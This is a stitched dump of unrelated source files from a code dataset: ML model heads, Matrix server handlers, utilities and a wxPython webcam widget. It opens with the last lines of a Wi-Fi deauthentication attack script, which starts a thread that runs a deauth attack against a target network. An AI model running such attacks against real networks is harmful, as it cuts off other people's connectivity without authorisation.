# We run the deauth_attack function in the thread with the argumenets hackbssid, item and wifi_name, we also specify it as a background daemon thread.
# A daemon thread keeps running until the main thread stops. You can stop the main thread with ctrl + c.
t = threading.Thread(target=deauth_attack, args=[hackbssid, item, wifi_name], daemon=True)
t.start()
except KeyboardInterrupt:
print("\nStopping Deauth")
# Set the network interface controller back into managed mode and restart network services.
set_into_managed_mode(wifi_name)
|
api/base/views/__init__.py | simpsonw/atmosphere | 197 | 17709 | from .version import VersionViewSet, DeployVersionViewSet
__all__ = ["VersionViewSet", "DeployVersionViewSet"]
|
amaranth/vendor/xilinx_spartan_3_6.py | psumesh/nmigen | 528 | 17710 | <reponame>psumesh/nmigen<filename>amaranth/vendor/xilinx_spartan_3_6.py
import warnings
from .xilinx import XilinxPlatform
__all__ = ["XilinxSpartan3APlatform", "XilinxSpartan6Platform"]
XilinxSpartan3APlatform = XilinxPlatform
XilinxSpartan6Platform = XilinxPlatform
# TODO(amaranth-0.4): remove
warnings.warn("instead of amaranth.vendor.xilinx_spartan_3_6.XilinxSpartan3APlatform and "
".XilinxSpartan6Platform, use amaranth.vendor.xilinx.XilinxPlatform",
DeprecationWarning, stacklevel=2)
|
synapse/handlers/room_member_worker.py | lukaslihotzki/synapse | 9,945 | 17771 | # Copyright 2018-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import TYPE_CHECKING, List, Optional, Tuple
from synapse.api.errors import SynapseError
from synapse.handlers.room_member import RoomMemberHandler
from synapse.replication.http.membership import (
ReplicationRemoteJoinRestServlet as ReplRemoteJoin,
ReplicationRemoteKnockRestServlet as ReplRemoteKnock,
ReplicationRemoteRejectInviteRestServlet as ReplRejectInvite,
ReplicationRemoteRescindKnockRestServlet as ReplRescindKnock,
ReplicationUserJoinedLeftRoomRestServlet as ReplJoinedLeft,
)
from synapse.types import JsonDict, Requester, UserID
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
class RoomMemberWorkerHandler(RoomMemberHandler):
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self._remote_join_client = ReplRemoteJoin.make_client(hs)
self._remote_knock_client = ReplRemoteKnock.make_client(hs)
self._remote_reject_client = ReplRejectInvite.make_client(hs)
self._remote_rescind_client = ReplRescindKnock.make_client(hs)
self._notify_change_client = ReplJoinedLeft.make_client(hs)
async def _remote_join(
self,
requester: Requester,
remote_room_hosts: List[str],
room_id: str,
user: UserID,
content: dict,
) -> Tuple[str, int]:
"""Implements RoomMemberHandler._remote_join"""
if len(remote_room_hosts) == 0:
raise SynapseError(404, "No known servers")
ret = await self._remote_join_client(
requester=requester,
remote_room_hosts=remote_room_hosts,
room_id=room_id,
user_id=user.to_string(),
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_reject_invite(
self,
invite_event_id: str,
txn_id: Optional[str],
requester: Requester,
content: dict,
) -> Tuple[str, int]:
"""
Rejects an out-of-band invite received from a remote user
Implements RoomMemberHandler.remote_reject_invite
"""
ret = await self._remote_reject_client(
invite_event_id=invite_event_id,
txn_id=txn_id,
requester=requester,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_rescind_knock(
self,
knock_event_id: str,
txn_id: Optional[str],
requester: Requester,
content: JsonDict,
) -> Tuple[str, int]:
"""
Rescinds a local knock made on a remote room
Args:
knock_event_id: the knock event
txn_id: optional transaction ID supplied by the client
requester: user making the request, according to the access token
content: additional content to include in the leave event.
Normally an empty dict.
Returns:
A tuple containing (event_id, stream_id of the leave event)
"""
ret = await self._remote_rescind_client(
knock_event_id=knock_event_id,
txn_id=txn_id,
requester=requester,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def remote_knock(
self,
remote_room_hosts: List[str],
room_id: str,
user: UserID,
content: dict,
) -> Tuple[str, int]:
"""Sends a knock to a room.
Implements RoomMemberHandler.remote_knock
"""
ret = await self._remote_knock_client(
remote_room_hosts=remote_room_hosts,
room_id=room_id,
user=user,
content=content,
)
return ret["event_id"], ret["stream_id"]
async def _user_left_room(self, target: UserID, room_id: str) -> None:
"""Implements RoomMemberHandler._user_left_room"""
await self._notify_change_client(
user_id=target.to_string(), room_id=room_id, change="left"
)
async def forget(self, target: UserID, room_id: str) -> None:
raise RuntimeError("Cannot forget rooms on workers.")
|
object_detection/det_heads/retinaNet_head/retinanet_head.py | no-name-xiaosheng/PaddleViT | 993 | 17796 | <reponame>no-name-xiaosheng/PaddleViT<gh_stars>100-1000
# Copyright (c) 2021 PPViT Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import paddle
import paddle.nn as nn
from paddle.nn.initializer import Normal, Constant
from retinanet_loss import RetinaNetLoss
from post_process import RetinaNetPostProcess
from det_utils.generator_utils import AnchorGenerator
class RetinaNetHead(nn.Layer):
'''
The head used in RetinaNet for object classification and box regression.
It has two subnets for the two tasks, with a common structure but separate parameters.
'''
def __init__(self, config):
'''
Args:
input_shape (List[ShapeSpec]): input shape.
num_classes (int): number of classes. Used to label background proposals.
num_anchors (int): number of generated anchors.
conv_dims (List[int]): dimensions for each convolution layer.
norm (str or callable):
Normalization for conv layers except for the two output layers.
See :func:`detectron2.layers.get_norm` for supported types.
loss_func (class): the class is used to compute loss.
prior_prob (float): Prior weight for computing bias.
'''
super(RetinaNetHead, self).__init__()
num_convs = config.RETINANET.NUM_CONVS
input_channels = config.RETINANET.INPUT_CHANNELS
norm = config.RETINANET.NORM
prior_prob = config.RETINANET.PRIOR_PROB
self.num_classes = config.RETINANET.NUM_CLASSES
self.get_loss = RetinaNetLoss(
focal_loss_alpha=config.RETINANET.FOCAL_LOSS_ALPHA,
focal_loss_gamma=config.RETINANET.FOCAL_LOSS_GAMMA,
smoothl1_loss_delta=config.RETINANET.SMOOTHL1_LOSS_DELTA,
positive_thresh=config.RETINANET.POSITIVE_THRESH,
negative_thresh=config.RETINANET.NEGATIVE_THRESH,
allow_low_quality=config.RETINANET.ALLOW_LOW_QUALITY,
num_classes=config.RETINANET.NUM_CLASSES,
weights=config.RETINANET.WEIGHTS
)
self.postprocess = RetinaNetPostProcess(
score_threshold=config.RETINANET.SCORE_THRESH,
keep_top_k=config.RETINANET.KEEP_TOPK,
nms_top_k=config.RETINANET.NMS_TOPK,
nms_threshold=config.RETINANET.NMS_THRESH,
bbox_reg_weights=config.RETINANET.WEIGHTS
)
self.anchor_generator = AnchorGenerator(anchor_sizes=config.RETINANET.ANCHOR_SIZE,
aspect_ratios=config.RETINANET.ASPECT_RATIOS,
strides=config.RETINANET.STRIDES,
offset=config.RETINANET.OFFSET)
num_anchors = self.anchor_generator.num_anchors
conv_dims = [input_channels] * num_convs
cls_net = []
reg_net = []
for in_channels, out_channels in zip(
[input_channels] + list(conv_dims), conv_dims
):
cls_net.append(
nn.Conv2D(in_channels, out_channels, kernel_size=3, stride=1, padding=1,
weight_attr=paddle.ParamAttr(initializer=Normal(mean=0., std=0.01)))
)
if norm == "bn":
cls_net.append(nn.BatchNorm2D(out_channels))
cls_net.append(nn.ReLU())
reg_net.append(
nn.Conv2D(in_channels, out_channels, kernel_size=3, stride=1, padding=1,
weight_attr=paddle.ParamAttr(initializer=Normal(mean=0., std=0.01)))
)
if norm == "bn":
reg_net.append(nn.BatchNorm2D(out_channels))
reg_net.append(nn.ReLU())
self.cls_net = nn.Sequential(*cls_net)
self.reg_net = nn.Sequential(*reg_net)
bias_value = -math.log((1 - prior_prob) / prior_prob)
self.cls_score = nn.Conv2D(
conv_dims[-1], num_anchors * self.num_classes, kernel_size=3, stride=1, padding=1,
weight_attr=paddle.ParamAttr(initializer=Normal(mean=0., std=0.01)),
bias_attr=paddle.ParamAttr(initializer=Constant(bias_value))
)
self.bbox_pred = nn.Conv2D(
conv_dims[-1], num_anchors * 4, kernel_size=3, stride=1, padding=1,
weight_attr=paddle.ParamAttr(initializer=Normal(mean=0., std=0.01))
)
def forward(self, feats, inputs):
'''
Returns:
loss_dict (dict) | pred_result(tensor), bbox_num(tensor):
loss_dict: contains cls_losses and reg_losses.
pred_result: the shape is [M, 6], M is the number of final preds,
Each row has 6 values: [label, score, xmin, ymin, xmax, ymax]
bbox_num: the shape is [N], N is the num of batch_size,
bbox_num[i] means the i'th img have bbox_num[i] boxes.
'''
anchors = self.anchor_generator(feats)
pred_scores = []
pred_boxes = []
for feat in feats:
pred_scores.append(self.cls_score(self.cls_net(feat)))
pred_boxes.append(self.bbox_pred(self.reg_net(feat)))
pred_scores_list = [
transpose_to_bs_hwa_k(s, self.num_classes) for s in pred_scores
]
pred_boxes_list = [
transpose_to_bs_hwa_k(s, 4) for s in pred_boxes
]
if self.training:
anchors = paddle.concat(anchors)
loss_dict = self.get_loss(anchors, [pred_scores_list, pred_boxes_list], inputs)
return loss_dict
else:
img_whwh = paddle.concat([inputs["imgs_shape"][:, 1:2],
inputs["imgs_shape"][:, 0:1]], axis=-1)
pred_result, bbox_num = self.postprocess(
pred_scores_list,
pred_boxes_list,
anchors,
inputs["scale_factor_wh"],
img_whwh
)
return pred_result, bbox_num
def transpose_to_bs_hwa_k(tensor, k):
assert tensor.dim() == 4
bs, _, h, w = tensor.shape
tensor = tensor.reshape([bs, -1, k, h, w])
tensor = tensor.transpose([0, 3, 4, 1, 2])
return tensor.reshape([bs, -1, k])
|
OcCo_Torch/models/pointnet_util.py | sun-pyo/OcCo | 158 | 17814 | <reponame>sun-pyo/OcCo
# Copyright (c) 2020. <NAME>, <EMAIL>
# Ref: https://github.com/fxia22/pointnet.pytorch/pointnet/model.py
import torch, torch.nn as nn, numpy as np, torch.nn.functional as F
from torch.autograd import Variable
def feature_transform_regularizer(trans):
d = trans.size()[1]
I = torch.eye(d)[None, :, :]
if trans.is_cuda:
I = I.cuda()
loss = torch.mean(torch.norm(torch.bmm(trans, trans.transpose(2, 1) - I), dim=(1, 2)))
return loss
# STN -> Spatial Transformer Network
class STN3d(nn.Module):
def __init__(self, channel):
super(STN3d, self).__init__()
self.conv1 = nn.Conv1d(channel, 64, 1) # in-channel, out-channel, kernel size
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 1024, 1)
self.fc1 = nn.Linear(1024, 512)
self.fc2 = nn.Linear(512, 256)
self.fc3 = nn.Linear(256, 9)
self.relu = nn.ReLU()
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(1024)
self.bn4 = nn.BatchNorm1d(512)
self.bn5 = nn.BatchNorm1d(256)
def forward(self, x):
B = x.size()[0]
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
x = torch.max(x, 2, keepdim=False)[0] # global descriptors
x = F.relu(self.bn4(self.fc1(x)))
x = F.relu(self.bn5(self.fc2(x)))
x = self.fc3(x)
iden = Variable(torch.from_numpy(np.eye(3).flatten().astype(np.float32))).view(1, 9).repeat(B, 1)
if x.is_cuda:
iden = iden.cuda()
x = x + iden
x = x.view(-1, 3, 3)
return x
class STNkd(nn.Module):
def __init__(self, k=64):
super(STNkd, self).__init__()
self.conv1 = nn.Conv1d(k, 64, 1)
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 1024, 1)
self.fc1 = nn.Linear(1024, 512)
self.fc2 = nn.Linear(512, 256)
self.fc3 = nn.Linear(256, k * k)
self.relu = nn.ReLU()
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(1024)
self.bn4 = nn.BatchNorm1d(512)
self.bn5 = nn.BatchNorm1d(256)
self.k = k
def forward(self, x):
B = x.size()[0]
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
x = torch.max(x, 2, keepdim=False)[0]
x = F.relu(self.bn4(self.fc1(x)))
x = F.relu(self.bn5(self.fc2(x)))
x = self.fc3(x)
iden = Variable(torch.from_numpy(np.eye(self.k).flatten().astype(np.float32))).view(
1, self.k ** 2).repeat(B, 1)
if x.is_cuda:
iden = iden.cuda()
x = x + iden
x = x.view(-1, self.k, self.k)
return x
class PointNetEncoder(nn.Module):
def __init__(self, global_feat=True, feature_transform=False,
channel=3, detailed=False):
# when input include normals, it
super(PointNetEncoder, self).__init__()
self.stn = STN3d(channel) # Batch * 3 * 3
self.conv1 = nn.Conv1d(channel, 64, 1)
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 1024, 1)
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(1024)
self.global_feat = global_feat
self.feature_transform = feature_transform
if self.feature_transform:
self.fstn = STNkd(k=64)
self.detailed = detailed
def forward(self, x):
_, D, N = x.size() # Batch Size, Dimension of Point Features, Num of Points
trans = self.stn(x)
x = x.transpose(2, 1)
if D > 3:
# pdb.set_trace()
x, feature = x.split([3, D-3], dim=2)
x = torch.bmm(x, trans)
# feature = torch.bmm(feature, trans) # feature -> normals
if D > 3:
x = torch.cat([x, feature], dim=2)
x = x.transpose(2, 1)
out1 = self.bn1(self.conv1(x))
x = F.relu(out1)
if self.feature_transform:
trans_feat = self.fstn(x)
x = x.transpose(2, 1)
x = torch.bmm(x, trans_feat)
x = x.transpose(2, 1)
else:
trans_feat = None
pointfeat = x
out2 = self.bn2(self.conv2(x))
x = F.relu(out2)
out3 = self.bn3(self.conv3(x))
# x = self.bn3(self.conv3(x))
x = torch.max(out3, 2, keepdim=False)[0]
if self.global_feat:
return x, trans, trans_feat
elif self.detailed:
return out1, out2, out3, x
else: # concatenate global and local feature together
x = x.view(-1, 1024, 1).repeat(1, 1, N)
return torch.cat([x, pointfeat], 1), trans, trans_feat
class PointNetPartSegEncoder(nn.Module):
def __init__(self, feature_transform=True, channel=3):
super(PointNetPartSegEncoder, self).__init__()
self.stn = STN3d(channel)
self.conv1 = nn.Conv1d(channel, 64, 1)
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 128, 1)
self.conv4 = nn.Conv1d(128, 512, 1)
self.conv5 = nn.Conv1d(512, 2048, 1)
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(128)
self.bn4 = nn.BatchNorm1d(512)
self.bn5 = nn.BatchNorm1d(2048)
self.feature_transform = feature_transform
if self.feature_transform:
self.fstn = STNkd(k=128)
def forward(self, point_cloud, label):
B, D, N = point_cloud.size()
trans = self.stn(point_cloud)
point_cloud = point_cloud.transpose(2, 1)
if D > 3:
point_cloud, feature = point_cloud.split(3, dim=2)
point_cloud = torch.bmm(point_cloud, trans)
if D > 3:
point_cloud = torch.cat([point_cloud, feature], dim=2)
point_cloud = point_cloud.transpose(2, 1)
out1 = F.relu(self.bn1(self.conv1(point_cloud)))
out2 = F.relu(self.bn2(self.conv2(out1)))
out3 = F.relu(self.bn3(self.conv3(out2)))
if self.feature_transform:
trans_feat = self.fstn(out3)
net_transformed = torch.bmm(out3.transpose(2, 1), trans_feat)
out3 = net_transformed.transpose(2, 1)
out4 = F.relu(self.bn4(self.conv4(out3)))
out5 = self.bn5(self.conv5(out4))
out_max = torch.max(out5, 2, keepdim=False)[0]
out_max = torch.cat([out_max, label.squeeze(1)], 1)
expand = out_max.view(-1, 2048 + 16, 1).repeat(1, 1, N)
concat = torch.cat([expand, out1, out2, out3, out4, out5], 1)
if self.feature_transform:
return concat, trans_feat
return concat
class encoder(nn.Module):
def __init__(self, num_channel=3, **kwargs):
super(encoder, self).__init__()
self.feat = PointNetEncoder(global_feat=True, channel=num_channel)
def forward(self, x):
feat, _, _ = self.feat(x)
return feat
class detailed_encoder(nn.Module):
def __init__(self, num_channel=3, **kwargs):
super(detailed_encoder, self).__init__()
self.feat = PointNetEncoder(global_feat=False,
channel=num_channel,
detailed=True)
def forward(self, x):
out1, out2, out3, x = self.feat(x)
return out1, out2, out3, x |
Kernel/kernel.py | y11en/BranchMonitoringProject | 122 | 17838 | <filename>Kernel/kernel.py
# Kernel introspection module to enrich branch collected data
# This code is part of BranchMonitoring framework
# Written by: <NAME> - 2017
# Federal University of Parana (UFPR)
from xml.etree.ElementTree import ElementTree # Parse XML
import subprocess # Run dump tools
import win32file as w # Use windows API
import time # Wait for data
import signal # Interrupt endless loop
# Monitoring class - retrieves branch data
class Monitor():
# class instantiation
def __init__(self,save=None):
self.save=save
self.mods = None # No introspection data at this point
signal.signal(signal.SIGINT,self.signal_handler) # Installing signal handler
# debug print
if __debug__:
print("Starting Monitor")
# open driver handle
def __open_driver_handler(self):
self.hdevice=w.CreateFile("\\\\.\\BranchMonitor",0x80000000|0x40000000,0,None,3,0x00000080,None)
# close driver handle
def __close_driver_handler(self):
w.CloseHandle(self.hdevice)
# get branch data from driver handle
def __get_branch_data(self):
# read bytes and string itself
tam,string = w.ReadFile(self.hdevice,200,None)
# if no data, return
if len(string)==0:
return None
# case having data
else:
# interpret string as hex address
branch=int(string[8:15][::-1].encode('hex'),16)
return branch
# signal handler
def signal_handler(self,signal,frame):
self.run=False
# get offset from a given function address
# mod: module to look into
# offset: offset to look for
def offset_to_func(self,mod,offset):
# get pointer to given module
funcs = self.exports[mod]
# default: no offset found
last_offset = 0
last_fname = "Unknown"
# search whole exported symbols
for f in funcs:
name = f[0] # function name
addr = f[1] # function offset
rel_addr = f[2] # relative function offset
# if we are looking for such offset
if offset == addr or offset == rel_addr:
# immediately returns
return name
# in case of a jump inside a given function
# consider the closest exported symbol
if offset > addr and addr > last_offset:
last_offset = addr
last_fname = name
# return "unknown" or the closest symbol
return last_fname
# identifies to which module a given address refers
def addr_to_module(self,branch):
# consider only the meaningful bytes
branch = branch & 0xFFFFFFFF
# look into all loaded modules
for m in self.mods:
start_addr = mods[m][0] # lowest addr
end_addr = mods[m][1] # highestaddr
# if branch is inside
if branch >= start_addr and branch <= end_addr:
# if there are exported symbols, dig into it
if(self.exports is not None):
# return base_module+function_at_offset
return m+"+"+self.offset_to_func(m,branch-start_addr)
# otherwise, return just the name
return m
# nothing found
return "Unknown"
# polling loop
def loop(self,mods=None,exports=None,save=False):
if save:
log = open(self.save,"w")
# default definitions
last = ""
self.mods = mods
self.exports = exports
self.run = True
# debug print
if __debug__:
print("Starting looping")
# open handler
self.__open_driver_handler()
try:
# infinite loop
while(self.run):
# try to get a branch tuple
branch=self.__get_branch_data()
# check if got
if branch is not None:
# no introspection, just print
if self.mods is None:
print("%x" % branch)
else:
# if there's introspection data, dig into it
module_string = self.addr_to_module(branch)
# do not print repeated entries
if module_string != last:
s = "%x <%s>" % (branch,module_string)
print(s)
if save:
log.write(s+"\n")
last = module_string
else:
# no data, sleep
time.sleep(1)
# signal received
finally:
# cleanup
if save:
log.close()
self.__close_driver_handler()
# Dumper: the introspection class
class Dumper():
# instantiation
def __init__(self):
# set parser configs
self.parse()
# set parser configs
def parse(self):
# External tools are required
# DriverView used to enumerate modules
# DriverView binary path
self.drvview_path = "driverview-x64\DriverView.exe"
# DriverView Output file
self.drvview_output = "driverview-x64\drv.xml"
# DllView used to map function to offsets
# DllView binary path
self.dllview_path = "dllexp-x64\dllexp.exe"
# DllView output
self.dllview_output = "Downloads\dllexp-x64\dll.xml"
# enumerate loaded modules
def dump_modules(self):
if __debug__:
print("Dumping Modules")
# using DriverView
s = subprocess.Popen([self.drvview_path,"/sxml",self.drvview_output])
s.wait()
# get offsets
def dump_exports(self,bin):
# using DllView
s = subprocess.Popen([self.dllview_path,"/from_files",bin,"/sxml",self.dllview_output])
s.wait()
# parse exported symbols
def parse_exports(self):
exp = []
self.dtree = ElementTree()
self.dtree.parse(self.dllview_output)
for p in self.dtree.findall("item"):
# get function name
fname = p.find('function_name').text
# try to get address
try:
# address
addr = int(p.find('address').text,16)
except:
# error, no meaningful address
addr = 0xFFFFFFFF
# also get relative addr
rel_addr = int(p.find('relative_address').text,16)
# add tuple to list
exp.append((fname,addr,rel_addr))
# return list
return exp
# get offsets and parse
def get_exports(self,bin):
if __debug__:
print("Getting Exports for: %s" % bin)
self.dump_exports(bin)
return self.parse_exports()
# parse loaded modules/drivers
def parse_modules(self):
mods = dict()
exports = dict()
self.dtree = ElementTree()
self.dtree.parse(self.drvview_output)
for p in self.dtree.findall("item"):
# module name
mod_name = p.find('driver_name').text
# initial addr
mod_addr = int(p.find('address').text.replace("`",""),16)
# end addr
mod_end_addr = int(p.find('end_address').text.replace("`",""),16)
# add to dict - no repeated modules
mods[mod_name]=(mod_addr,mod_end_addr)
# try to get exports for the module
# returns a list
exp = self.get_exports(p.find('filename').text)
# map module to export list
exports[mod_name] = exp
# return module dict and exports dict
return mods, exports
# "main"
if __name__ == '__main__':
# introspect first
d = Dumper()
d.dump_modules()
mods, exports = d.parse_modules()
# then monitor
m=Monitor(save="save.log")
# infinite loop
# introspected data as parameter to the monitor
m.loop(mods,exports,True)
# no module import
else:
print("No module import support yet!")
|
cv2/wxPython-CV-widget/main.py | whitmans-max/python-examples | 140 | 17843 | import wx
import cv2
#----------------------------------------------------------------------
# Panel to display image from camera
#----------------------------------------------------------------------
class WebcamPanel(wx.Window): # wx.Panel, wx.Control
def __init__(self, parent, camera, fps=15, flip=False):
wx.Window.__init__(self, parent)
# remember arguments
self.camera = camera
self.fps = fps
self.flip = flip
# get frame size
ret_value, frame = self.camera.read()
height, width = frame.shape[:2]
# resize panel with camera image
self.SetSize( (width, height) )
#self.SetMinSize( (width, height) )
# resize main window
self.GetParent().GetParent().SetSize( (width, height+37) ) # wymaga poprawki aby nie trzeba bylo dawac +37
#self.GetGrandParent().SetSize( (width, height+25) )
#self.GetTopLevelParent().SetSize( (width, height+25) ) # wrong parent
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
if self.flip:
frame = cv2.flip(frame, 1)
# create bitmap with frame
self.bmp = wx.BitmapFromBuffer(width, height, frame)
# timer to refresh frames
self.timer = wx.Timer(self)
self.timer.Start(1000./fps)
# add functions to events
self.Bind(wx.EVT_PAINT, self.OnPaint) # run when it is needed
self.Bind(wx.EVT_TIMER, self.NextFrame) # run by timer
def OnPaint(self, event):
dc = wx.BufferedPaintDC(self)
dc.DrawBitmap(self.bmp, 0, 0)
def NextFrame(self, event):
ret_value, frame = self.camera.read()
if ret_value:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
if self.flip:
frame = cv2.flip(frame, 1)
self.bmp.CopyFromBuffer(frame)
self.Refresh()
#----------------------------------------------------------------------
# Main Window
#----------------------------------------------------------------------
class MainWindow(wx.Frame):
def __init__(self, camera, fps=10):
wx.Frame.__init__(self, None)
self.panel = wx.Panel(self, -1)
# add sizer
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.panel.SetSizer(self.sizer)
# add button
self.button = wx.Button(self.panel, label="CAPTURE")
self.button.Bind(wx.EVT_BUTTON, self.OnButton)
self.sizer.Add(self.button, 0, wx.EXPAND)
# add panel with webcam image
self.webcampanel = WebcamPanel(self.panel, camera)
self.sizer.Add(self.webcampanel, 1, wx.EXPAND)
#self.sizer.Layout()
#self.webcampanel.Layout()
#self.Fit()
self.Show()
def OnButton(self, event):
print("TODO: save image in file")
#----------------------------------------------------------------------
camera = cv2.VideoCapture(0)
app = wx.App()
MainWindow(camera)
app.MainLoop()
|
datapackage_pipelines/generators/utilities.py | gperonato/datapackage-pipelines | 109 | 17848 | def arg_to_step(arg):
if isinstance(arg, str):
return {'run': arg}
else:
return dict(zip(['run', 'parameters', 'cache'], arg))
def steps(*args):
return [arg_to_step(arg) for arg in args]
|
src/UQpy/Distributions/baseclass/DistributionContinuous1D.py | marrov/UQpy | 132 | 17858 | import numpy as np
import scipy.stats as stats
from UQpy.Distributions.baseclass.Distribution import Distribution
class DistributionContinuous1D(Distribution):
"""
Parent class for univariate continuous probability distributions.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
@staticmethod
def _check_x_dimension(x):
"""
Check the dimension of input x - must be an ndarray of shape (npoints,) or (npoints, 1)
"""
x = np.atleast_1d(x)
if len(x.shape) > 2 or (len(x.shape) == 2 and x.shape[1] != 1):
raise ValueError('Wrong dimension in x.')
return x.reshape((-1,))
def _construct_from_scipy(self, scipy_name=stats.rv_continuous):
self.cdf = lambda x: scipy_name.cdf(x=self._check_x_dimension(x), **self.params)
self.pdf = lambda x: scipy_name.pdf(x=self._check_x_dimension(x), **self.params)
self.log_pdf = lambda x: scipy_name.logpdf(x=self._check_x_dimension(x), **self.params)
self.icdf = lambda x: scipy_name.ppf(q=self._check_x_dimension(x), **self.params)
self.moments = lambda moments2return='mvsk': scipy_name.stats(moments=moments2return, **self.params)
self.rvs = lambda nsamples=1, random_state=None: scipy_name.rvs(
size=nsamples, random_state=random_state, **self.params).reshape((nsamples, 1))
def tmp_fit(dist, data):
data = self._check_x_dimension(data)
fixed_params = {}
for key, value in dist.params.items():
if value is not None:
fixed_params['f' + key] = value
params_fitted = scipy_name.fit(data=data, **fixed_params)
return dict(zip(dist.order_params, params_fitted))
self.fit = lambda data: tmp_fit(self, data) |
malaya_speech/supervised/unet.py | ishine/malaya-speech | 111 | 17881 | from malaya_speech.utils import (
check_file,
load_graph,
generate_session,
nodes_session,
)
from malaya_speech.model.tf import UNET, UNETSTFT, UNET1D
def load(model, module, quantized=False, **kwargs):
path = check_file(
file=model,
module=module,
keys={'model': 'model.pb'},
quantized=quantized,
**kwargs,
)
g = load_graph(path['model'], **kwargs)
inputs = ['Placeholder']
outputs = ['logits']
input_nodes, output_nodes = nodes_session(g, inputs, outputs)
return UNET(
input_nodes=input_nodes,
output_nodes=output_nodes,
sess=generate_session(graph=g, **kwargs),
model=model,
name=module,
)
def load_stft(model, module, instruments, quantized=False, **kwargs):
path = check_file(
file=model,
module=module,
keys={'model': 'model.pb'},
quantized=quantized,
**kwargs,
)
g = load_graph(path['model'], **kwargs)
inputs = ['Placeholder']
outputs = [f'logits_{i}' for i in range(len(instruments))]
input_nodes, output_nodes = nodes_session(g, inputs, outputs)
return UNETSTFT(
input_nodes=input_nodes,
output_nodes=output_nodes,
instruments=instruments,
sess=generate_session(graph=g, **kwargs),
model=model,
name=module,
)
def load_1d(model, module, quantized=False, **kwargs):
path = check_file(
file=model,
module=module,
keys={'model': 'model.pb'},
quantized=quantized,
**kwargs,
)
g = load_graph(path['model'], **kwargs)
inputs = ['Placeholder']
outputs = ['logits']
input_nodes, output_nodes = nodes_session(g, inputs, outputs)
return UNET1D(
input_nodes=input_nodes,
output_nodes=output_nodes,
sess=generate_session(graph=g, **kwargs),
model=model,
name=module,
)
|
qtapps/skrf_qtwidgets/analyzers/analyzer_rs_zva.py | mike0164/scikit-rf | 379 | 17906 | <gh_stars>100-1000
from skrf.vi.vna import rs_zva
class Analyzer(rs_zva.ZVA):
DEFAULT_VISA_ADDRESS = "GPIB::16::INSTR"
NAME = "Rhode & Schwartz ZVA"
NPORTS = 4
NCHANNELS = 32
SCPI_VERSION_TESTED = ''
|
silver/api/pagination.py | DocTocToc/silver | 222 | 17916 | # Copyright (c) 2015 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
from rest_framework.settings import api_settings
from rest_framework.utils.urls import replace_query_param, remove_query_param
class LinkHeaderPagination(PageNumberPagination):
page_size = api_settings.PAGE_SIZE or 30
page_size_query_param = 'page_size'
max_page_size = 100
def get_last_link(self):
url = self.request.build_absolute_uri()
page_number = self.page.paginator.num_pages
return replace_query_param(url, self.page_query_param, page_number)
def get_first_link(self, display_page_query_param=True):
url = self.request.build_absolute_uri()
if display_page_query_param:
page_number = self.page.paginator.validate_number(1)
return replace_query_param(url, self.page_query_param, page_number)
else:
return remove_query_param(url, self.page_query_param)
def get_paginated_response(self, data):
next_url = self.get_next_link()
previous_url = self.get_previous_link()
first_url = self.get_first_link()
last_url = self.get_last_link()
if next_url is not None and previous_url is not None:
link = '<{next_url}>; rel="next", <{previous_url}>; rel="prev"'
elif next_url is not None:
link = '<{next_url}>; rel="next"'
elif previous_url is not None:
link = '<{previous_url}>; rel="prev"'
else:
link = ''
if link:
link += ', '
link += '<{first_url}>; rel="first", <{last_url}> rel="last"'
link = link.format(next_url=next_url, previous_url=previous_url,
first_url=first_url, last_url=last_url)
headers = {'Link': link} if link else {}
return Response(data, headers=headers)
|
tests/cpydiff/modules_array_deletion.py | learnforpractice/micropython-cpp | 692 | 17921 | """
categories: Modules,array
description: Array deletion not implemented
cause: Unknown
workaround: Unknown
"""
import array
a = array.array('b', (1, 2, 3))
del a[1]
print(a)
|
